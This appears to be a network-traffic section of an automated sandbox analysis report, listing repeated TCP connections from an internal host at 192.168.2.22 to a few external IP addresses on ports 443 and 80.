      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
